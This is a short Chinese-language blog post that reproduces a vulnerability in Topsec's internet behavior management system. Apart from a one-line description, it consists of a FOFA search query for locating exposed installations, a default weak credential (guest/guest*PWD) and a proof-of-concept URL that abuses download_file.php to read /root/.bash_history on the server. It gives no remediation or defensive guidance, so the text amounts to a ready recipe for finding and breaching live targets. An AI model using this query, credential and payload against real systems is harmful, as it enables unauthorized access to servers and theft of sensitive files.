天融信上网行为管理系统存在任意文件读取漏洞

2021-07-30 漏洞复现漏洞复现 web渗透字数统计: 134字阅读时长: 1分

0x01 漏洞介绍

天融信-上网行为管理系统存在弱口令漏洞并存在任意文件读取漏洞，攻击者可利用该漏洞获取服务器上的铭感文件。

0x02 漏洞复现

fofa语法

app="天融信-上网行为管理系统"

fofa上看了一波，还是有很多资产的

弱口令：guest/guest*PWD

POC:https://xxxxxxx/view/action/download_file.php?filename=/root/.bash_history&savename=

本文链接: https://ad-calcium.github.io/2021/07/%E5%A4%A9%E8%9E%8D%E4%BF%A1%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/

License: CC BY 4.0 CN

AD钙奶

Good Good Study, Day Day Up~